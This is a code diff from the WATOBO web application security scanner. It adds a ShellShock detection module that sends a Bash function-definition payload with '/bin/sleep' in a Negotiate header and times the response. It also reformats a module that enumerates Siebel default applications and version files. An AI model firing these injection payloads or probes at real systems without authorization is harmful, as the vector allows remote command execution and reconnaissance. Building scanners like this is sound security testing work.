watobo 0.9.19 → 0.9.20

data/modules/active/shell_shock/shell_shock.rb

@@ -0,0 +1,149 @@
+#.
+# shell_shock.rb
+#.
+# Copyright 2014 by siberas, http://www.siberas.de
+# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
+# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
+# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
+# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+
+=begin
+$ curl -i -H "Negotiate: () { :; }; /bin/sleep 3" http://192.168.70.134/cgi-bin/shock.cgi
+HTTP/1.1 500 Internal Server Error
+Date: Fri, 24 Jan 2014 08:50:10 GMT
+Server: Apache/2.2.22 (Debian)
+Vary: Accept-Encoding
+Content-Length: 619
+Connection: close
+Content-Type: text/html; charset=iso-8859-1
+
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+<html><head>
+<title>500 Internal Server Error</title>
+</head><body>
+<h1>Internal Server Error</h1>
+<p>The server encountered an internal error or
+misconfiguration and was unable to complete
+your request.</p>
+<p>Please contact the server administrator,
+ webmaster@localhost and inform them of the time the error occurred,
+and anything you might have done that may have
+caused the error.</p>
+<p>More information about this error may be available
+in the server error log.</p>
+<hr>
+<address>Apache/2.2.22 (Debian) Server at 192.168.70.134 Port 80</address>
+</body></html>
+  
+=end
+
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Shell_shock
+        
+        
+        class Shell_shock < Watobo::ActiveCheck
+          @info.update(
+                         :check_name => 'ShellShock',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :check_group => AC_GROUP_GENERIC,
+            :description => "",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "0.9"   # check version
+            )
+            
+            threat =<<'EOF'
+            Really bad, bad things can happen! 
+EOF
+            
+            measure = "Patch it!"
+            
+            @finding.update(
+                            :threat => threat,        # thread of vulnerability, e.g. loss of information
+                            :class => "ShellShock (RCE)",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+                            :type => FINDING_TYPE_VULN,         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN
+                            :rating => VULN_RATING_CRITICAL,
+                            :measure => measure
+                            )
+            
+            
+          def initialize(project, prefs={})
+            super(project, prefs)
+            
+          end
+          
+          def generateChecks(chat)
+                         
+                checker = proc {
+                   test_request = nil
+                   test_response = nil
+                   output = ""
+                   
+                   rtimes = []
+                     
+                   timing_response = nil
+                      
+                   3.times do
+                        test = chat.copyRequest
+                         start = Time.now().to_i
+                         timing_request, timing_response = doRequest(test,:default => true)
+                         stop = Time.now().to_i
+                         rtimes << ( stop - start )
+                      
+                    end
+                      # now calculate the average time
+                      t_average = rtimes.inject(:+) / rtimes.length
+                      t_average = 1 if t_average == 0
+                      
+                      time_to_sleep = rtimes.max > (2 * t_average) ? rtimes.max : (2 * t_average)
+                      
+                      timeout_counter = 0
+                     t_start = Time.now().to_i
+                   
+                   request = chat.copyRequest
+                   request.addHeader("Negotiate", "() { :;}; /bin/sleep #{time_to_sleep}")
+                   
+                   test_request, test_response = doRequest(request, :default => true)
+                   
+                   t_stop = Time.now.to_i
+                   timeout_counter += 1
+                         
+                   duration = t_stop - t_start
+                   #  puts duration
+                   if ( duration >= time_to_sleep )
+                           puts "Found ShellShock Vulnerablitiy !!!"
+                           puts "after #{duration}s / time-to-sleep #{time_to_sleep}s)"
+                          
+                           test_request.extend Watobo::Mixin::Parser::Url unless test_request.respond_to? :path
+                          
+                           path = "/" + test_request.path
+                          
+                           output << "SleepTime: #{time_to_sleep}\nQuery Duration: #{duration}s" 
+                                                   
+                           addFinding( test_request, test_response,
+                                     :check_pattern => "Negotiate.*sleep \d",
+                                     :chat => chat,
+                                     :title => "[Timing] - #{path}",
+                                     :proof_pattern => "",
+                                     :test_item => "Negotiate",
+                                     :class => "ShellShock (Time-based)",
+                                     :output => output               
+                                     )
+                            #readlines
+                          break 
+                         end
+                        
+                     
+                    [ test_request, test_response ]
+                  }
+                  yield checker
+                  
+                
+             end
+          end
+
+        # --> eo namespace    
+      end
+    end
+  end
+end

data/modules/active/siebel/siebel_apps.rb

@@ -1,182 +1,170 @@
-# .
+#.
 # siebel_apps.rb
-# 
-# Copyright 2013 by siberas, http://www.siberas.de
-# 
-# This file is part of WATOBO (Web Application Tool Box)
-#        http://watobo.sourceforge.com
-# 
-# WATOBO is free software; you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation version 2 of the License.
-# 
-# WATOBO is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-# 
-# You should have received a copy of the GNU General Public License
-# along with WATOBO; if not, write to the Free Software
-# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
-# .
-# @private 
-module Watobo#:nodoc: all
-  module Modules
-    module Active
-      module Siebel
-        
-        class Siebel_apps < Watobo::ActiveCheck
-          check_group = File.dirname(File.expand_path(__FILE__)).split("/").last.capitalize!
-          @@tested_directories = Hash.new
-          
-          @info.update(
-                         :check_name => 'Siebel Applications',    # name of check which briefly describes functionality, will be used for tree and progress views
-            :description => "Enumerate Siebel Applications And Default Files, e.g. base.txt",   # description of checkfunction
-            :author => "Andreas Schmidt", # author of check
-            :version => "1.0",   # check version
-            :check_group =>  check_group
-            )
-            
-            @finding.update(
-                            :threat => 'Information',        # thread of vulnerability, e.g. loss of information
-            :class => "Siebel: Default Applications",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
-            :type => FINDING_TYPE_INFO         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN 
-            )
-          
-          def initialize(project, prefs={})
-           
-            super(project, prefs)
-            
-            @apps = %w( callcenter cgce cra eCommunicationsWireless eEnergyOilGasChemicals eaf eai eai_anon eauctionswexml eautomotive echannelaf echannelcg echannelcme eclinical ecommunications econsumer econsumerpharma econsumersector ecustomer ecustomercme edealer edealerscw eenergy eevents ehospitality eloyalty emarketing emedia emedical ememb epharma epharmace eprofessionalpharma epublicsector eretail erm ermadmin esales esalescme eservice esitesclinical etraining finesales fins finsconsole finscustomer finsebanking finsebrokerage finsechannel finseenenrollment finssalespam htim htimpim loyalty loyaltyscw marketing medicalce pimportal pmmanager prmmanager prmportal pseservice sales salesce service servicece siasalesce siaservicece sismarketing smc wpeserv wppm wpsales wpserv )
-            @langs = %w( cat chs cht csy dan deu ell enu esn euq fin fra frc heb hun ita jpn kor nld nor plk pse psl ptb ptg rus shl sky slv sve tha trk )
-            
-            
-          end
-          
-           def reset()
-            @@tested_directories.clear
+#.
+# Copyright 2014 by siberas, http://www.siberas.de
+# This file is part of WATOBO (Web Application Tool Box) http://watobo.sourceforge.com
+# WATOBO is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation version 2 of the License.
+# WATOBO is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more details.
+# You should have received a copy of the GNU General Public License along with WATOBO; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 
-          end
-          
-          
-          def generateChecks(chat)
-            
-            begin
-              path = chat.request.dir
-             # puts "!!!!#{self}: #{path}"
-              unless @@tested_directories.has_key?(path)
-                @@tested_directories[path] = true
-                
-                @apps.each do |app|
-                  @langs.each do |lang|
-                    
-                    
-                  checker = proc{
-                    begin
-                    app_dir = "#{app}_#{lang}"
-                    #puts app_dir
-                    test_request = nil
-                    test_response = nil
-                    test = chat.copyRequest
-                    test.appendDir app_dir
-                    
-                    status, test_request, test_response = fileExists?(test, :default => true)
-                    
-                    if status == true 
-                     
-                   #   test_chat = Chat.new(test,test_response, :id => chat.id)
-                      
-                        addFinding( test_request,test_response,
-                          :test_item => chat.request.url.to_s,
-                          :check_pattern => "#{app_dir}",
-                          :proof_pattern => "#{test_response.status}",
-                          :chat => chat,
-                          :title => "#{app_dir}"
-                      )
-                      
-                      # check for _stats.swe
-                      stats_test = chat.copyRequest
-                      stats_test.replaceFileExt("_stats.swe")
-                      status, stats_request, stats_response = fileExists?( stats_test, :default => true)
-                    
-                      if status == true and stats_response.has_body?
-                         addFinding( stats_request,stats_response,
-                          :test_item => stats_request.url.to_s,
-                          :check_pattern => "#{app_dir}",
-                          :proof_pattern => "#{stats_response.status}",
-                          :chat => chat,
-                          :title => "#{app_dir}",
-                          :check_name => "Siebel Stats Page",
-                          :class => "Siebel: Stats Page"
-                        )
-                      end
-                      
-                      # check for base.txt
-                      base_test = chat.copyRequest
-                      base_test.appendDir app_dir
-                      base_test.replaceFileExt("base.txt")
-                     # puts base_test.url
-                      status, base_request, base_response = fileExists?(base_test, :default => true)
-                    
-                      if status == true and base_response.has_body?
-                        version = nil
-                        if base_response.body.strip =~ /^([0-9.]*) /
-                          version = $1
-                        end
-                         addFinding( base_request,base_response,
-                          :test_item => base_request.url.to_s,
-                          :check_pattern => "base.txt",
-                          :proof_pattern => "#{base_response.status}",
-                          :chat => chat,
-                          :title => "#{app_dir}",
-                          :check_name => "Siebel Version #{version}",
-                          :class => "Siebel: Version #{version}"
-                        )
-                      end
-                      
-                      # check for About_Siebel.htm and siebindex.htm                      
-                      %w( About_Siebel.htm help/siebindex.htm siebindex.htm ).each do |df|
-                        default_test = chat.copyRequest
-                      default_test.appendDir app_dir
-                      default_test.replaceFileExt(df)
-                      status, default_request, default_response = fileExists?(default_test, :default => true)
-                    
-                      if status == true 
-                         addFinding( default_request,default_response,
-                          :test_item => "#{default_request.url.to_s}",
-                          :check_pattern => "#{df}",
-                          :proof_pattern => "#{default_response.status}",
-                          :chat => chat,
-                          :title => "#{df}",
-                          #:check_name => "Siebel Version #{version}",
-                          :class => "Siebel: Default Files"
-                        )
-                      end
-                      end
-                    
-                    end
-                    rescue => bang
-                      puts bang
-                      puts bang.backtrace
-                    end
-                    [ test_request, test_response ]
-                  }
-                  yield checker
-                  end
-                end
-              end            
-              
-            rescue => bang
-              puts bang
-              puts "ERROR!! #{Module.nesting[0].name}"
-              raise
-              
-            end
-          end
-          
-        end
-        # --> eo namespace    
-      end
-    end
-  end
-end
+# @private 
+module Watobo#:nodoc: all
+  module Modules
+    module Active
+      module Siebel
+        
+        class Siebel_apps < Watobo::ActiveCheck
+          check_group = File.dirname(File.expand_path(__FILE__)).split("/").last.capitalize!
+          @@tested_directories = Hash.new
+          
+          @info.update(
+                         :check_name => 'Siebel Applications',    # name of check which briefly describes functionality, will be used for tree and progress views
+            :description => "Enumerate Siebel Applications And Default Files, e.g. base.txt",   # description of checkfunction
+            :author => "Andreas Schmidt", # author of check
+            :version => "1.0",   # check version
+            :check_group =>  check_group
+            )
+            
+            @finding.update(
+                            :threat => 'Information',        # thread of vulnerability, e.g. loss of information
+            :class => "Siebel: Default Applications",    # vulnerability class, e.g. Stored XSS, SQL-Injection, ...
+            :type => FINDING_TYPE_INFO         # FINDING_TYPE_HINT, FINDING_TYPE_INFO, FINDING_TYPE_VULN 
+            )
+          
+          def initialize(project, prefs={})
+           
+            super(project, prefs)
+            
+            @apps = %w( callcenter cgce cra eCommunicationsWireless eEnergyOilGasChemicals eaf eai eai_anon eauctionswexml eautomotive echannelaf echannelcg echannelcme eclinical ecommunications econsumer econsumerpharma econsumersector ecustomer ecustomercme edealer edealerscw eenergy eevents ehospitality eloyalty emarketing emedia emedical ememb epharma epharmace eprofessionalpharma epublicsector eretail erm ermadmin esales esalescme eservice esitesclinical etraining finesales fins finsconsole finscustomer finsebanking finsebrokerage finsechannel finseenenrollment finssalespam htim htimpim loyalty loyaltyscw marketing medicalce pimportal pmmanager prmmanager prmportal pseservice sales salesce service servicece siasalesce siaservicece sismarketing smc wpeserv wppm wpsales wpserv )
+            @langs = %w( cat chs cht csy dan deu ell enu esn euq fin fra frc heb hun ita jpn kor nld nor plk pse psl ptb ptg rus shl sky slv sve tha trk )
+            
+            
+          end
+          
+           def reset()
+            @@tested_directories.clear
+
+          end
+          
+          
+          def generateChecks(chat)
+            
+            begin
+              path = chat.request.dir
+             # puts "!!!!#{self}: #{path}"
+              unless @@tested_directories.has_key?(path)
+                @@tested_directories[path] = true
+                
+                @apps.each do |app|
+                  @langs.each do |lang|
+                    
+                    
+                  checker = proc{
+                    begin
+                    app_dir = "#{app}_#{lang}"
+                    #puts app_dir
+                    test_request = nil
+                    test_response = nil
+                    test = chat.copyRequest
+                    test.appendDir app_dir
+                    
+                    status, test_request, test_response = fileExists?(test, :default => true)
+                    
+                    if status == true 
+                     
+                   #   test_chat = Chat.new(test,test_response, :id => chat.id)
+                      
+                        addFinding( test_request,test_response,
+                          :test_item => chat.request.url.to_s,
+                          :check_pattern => "#{app_dir}",
+                          :proof_pattern => "#{test_response.status}",
+                          :chat => chat,
+                          :title => "#{app_dir}"
+                      )
+                      
+                      # check for _stats.swe
+                      stats_test = chat.copyRequest
+                      stats_test.replaceFileExt("_stats.swe")
+                      status, stats_request, stats_response = fileExists?( stats_test, :default => true)
+                    
+                      if status == true and stats_response.has_body?
+                         addFinding( stats_request,stats_response,
+                          :test_item => stats_request.url.to_s,
+                          :check_pattern => "#{app_dir}",
+                          :proof_pattern => "#{stats_response.status}",
+                          :chat => chat,
+                          :title => "#{app_dir}",
+                          :check_name => "Siebel Stats Page",
+                          :class => "Siebel: Stats Page"
+                        )
+                      end
+                      
+                      # check for base.txt
+                      base_test = chat.copyRequest
+                      base_test.appendDir app_dir
+                      base_test.replaceFileExt("base.txt")
+                     # puts base_test.url
+                      status, base_request, base_response = fileExists?(base_test, :default => true)
+                    
+                      if status == true and base_response.has_body?
+                        version = nil
+                        if base_response.body.strip =~ /^([0-9.]*) /
+                          version = $1
+                        end
+                         addFinding( base_request,base_response,
+                          :test_item => base_request.url.to_s,
+                          :check_pattern => "base.txt",
+                          :proof_pattern => "#{base_response.status}",
+                          :chat => chat,
+                          :title => "#{app_dir}",
+                          :check_name => "Siebel Version #{version}",
+                          :class => "Siebel: Version #{version}"
+                        )
+                      end
+                      
+                      # check for About_Siebel.htm and siebindex.htm                      
+                      %w( About_Siebel.htm help/siebindex.htm siebindex.htm ).each do |df|
+                        default_test = chat.copyRequest
+                      default_test.appendDir app_dir
+                      default_test.replaceFileExt(df)
+                      status, default_request, default_response = fileExists?(default_test, :default => true)
+                    
+                      if status == true 
+                         addFinding( default_request,default_response,
+                          :test_item => "#{default_request.url.to_s}",
+                          :check_pattern => "#{df}",
+                          :proof_pattern => "#{default_response.status}",
+                          :chat => chat,
+                          :title => "#{df}",
+                          #:check_name => "Siebel Version #{version}",
+                          :class => "Siebel: Default Files"
+                        )
+                      end
+                      end
+                    
+                    end
+                    rescue => bang
+                      puts bang
+                      puts bang.backtrace
+                    end
+                    [ test_request, test_response ]
+                  }
+                  yield checker
+                  end
+                end
+              end            
+              
+            rescue => bang
+              puts bang
+              puts "ERROR!! #{Module.nesting[0].name}"
+              raise
+              
+            end
+          end
+          
+        end
+        # --> eo namespace    
+      end
+    end
+  end
+end